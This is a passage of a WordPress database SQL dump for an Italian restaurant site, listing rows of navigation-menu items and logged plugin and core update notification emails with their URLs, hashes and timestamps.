Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2603,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-16/','124:55ebb0c9a26f47ee6e5c5c6ff9b117be',4630,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-03-04 05:52:43','2021-03-04 10:52:43',1,NULL,NULL,NULL,NULL,0,NULL),(2351,NULL,NULL,4371,'post','nav_menu_item',1,0,NULL,NULL,'Shop Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2352,NULL,NULL,4372,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2353,NULL,NULL,4373,'post','nav_menu_item',1,0,NULL,NULL,'Shop Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2354,NULL,NULL,4374,'post','nav_menu_item',1,0,NULL,NULL,'Shop Pages','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2355,NULL,NULL,4375,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2602,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-15/','124:263f1d81aaf173f08d6c279b987c06e3',4629,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-03-03 01:08:37','2021-03-03 06:08:38',1,NULL,NULL,NULL,NULL,0,NULL),(2356,NULL,NULL,4376,'post','nav_menu_item',1,0,NULL,NULL,'Product Single','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2357,NULL,NULL,4377,'post','nav_menu_item',1,0,NULL,NULL,'Classic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2358,NULL,NULL,4378,'post','nav_menu_item',1,0,NULL,NULL,'Presentation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2359,NULL,NULL,4379,'post','nav_menu_item',1,0,NULL,NULL,'Infographic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2360,NULL,NULL,4380,'post','nav_menu_item',1,0,NULL,NULL,'Typography','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2601,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-14/','124:d32270830560a88264fd3f4dc008c39e',4628,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-28 14:33:13','2021-02-28 19:33:13',1,NULL,NULL,NULL,NULL,0,NULL),(2361,NULL,NULL,4381,'post','nav_menu_item',1,0,NULL,NULL,'Classic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2362,NULL,NULL,4382,'post','nav_menu_item',1,0,NULL,NULL,'Presentation','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2363,NULL,NULL,4383,'post','nav_menu_item',1,0,NULL,NULL,'Infographic','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2364,NULL,NULL,4384,'post','nav_menu_item',1,0,NULL,NULL,'Typography','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2365,NULL,NULL,4385,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2366,NULL,NULL,4386,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2367,NULL,NULL,4387,'post','nav_menu_item',1,0,NULL,NULL,'Post Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:18','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2600,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-13/','124:a9b89e99b2ed4ba671b859461a11c4ce',4627,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-24 12:23:55','2021-02-24 17:23:56',1,NULL,NULL,NULL,NULL,0,NULL),(2368,NULL,NULL,4388,'post','nav_menu_item',1,0,NULL,NULL,'Single Types','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2369,NULL,NULL,4389,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2370,NULL,NULL,4390,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2371,NULL,NULL,4391,'post','nav_menu_item',1,0,NULL,NULL,'Portfolio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2372,NULL,NULL,4392,'post','nav_menu_item',1,0,NULL,NULL,'Layouts','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2599,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-12/','124:a6a79648e1d8117b1203e6b9f2826f09',4626,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-23 12:40:25','2021-02-23 17:40:26',1,NULL,NULL,NULL,NULL,0,NULL),(2373,NULL,NULL,4393,'post','nav_menu_item',1,0,NULL,NULL,'Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:19','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2374,NULL,NULL,4394,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2375,NULL,NULL,4395,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2376,NULL,NULL,4396,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2377,NULL,NULL,4397,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2378,NULL,NULL,4398,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2598,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-il-tuo-sito-e-aggiornato-a-wordpress-5-6-2/','112:0013e7cece615d23a986f4c76f0134be',4625,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Il tuo sito è aggiornato a WordPress 5.6.2','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-23 01:08:29','2021-02-23 06:08:41',1,NULL,NULL,NULL,NULL,0,NULL),(2379,NULL,NULL,4399,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2380,NULL,NULL,4400,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2381,NULL,NULL,4401,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2382,NULL,NULL,4402,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2383,NULL,NULL,4403,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2384,NULL,NULL,4404,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2385,NULL,NULL,4405,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2386,NULL,NULL,4406,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2387,NULL,NULL,4407,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2388,NULL,NULL,4408,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2389,NULL,NULL,4409,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2390,NULL,NULL,4410,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2596,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-10/','124:817654bbe911c8c8576d1321c4aaf3ab',4623,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-19 00:23:39','2021-02-19 05:23:40',1,NULL,NULL,NULL,NULL,0,NULL),(2391,NULL,NULL,4411,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2392,NULL,NULL,4412,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2393,NULL,NULL,4413,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:22','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2394,NULL,NULL,4414,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2395,NULL,NULL,4415,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2396,NULL,NULL,4416,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2397,NULL,NULL,4417,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2398,NULL,NULL,4418,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2595,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-9/','123:00abe7f50b6f3ce491e8bd4d5856a4ea',4622,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-17 13:07:31','2021-02-17 18:07:31',1,NULL,NULL,NULL,NULL,0,NULL),(2399,NULL,NULL,4419,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2400,NULL,NULL,4420,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2401,NULL,NULL,4421,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2402,NULL,NULL,4422,'post','nav_menu_item',1,3034,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2403,NULL,NULL,4423,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2404,NULL,NULL,4424,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2405,NULL,NULL,4425,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2406,NULL,NULL,4426,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2407,NULL,NULL,4427,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2408,NULL,NULL,4428,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2409,NULL,NULL,4429,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2410,NULL,NULL,4430,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2594,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-8/','123:04e09fcc8d032b40f5e5d6c7564f9942',4621,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-12 12:33:03','2021-02-12 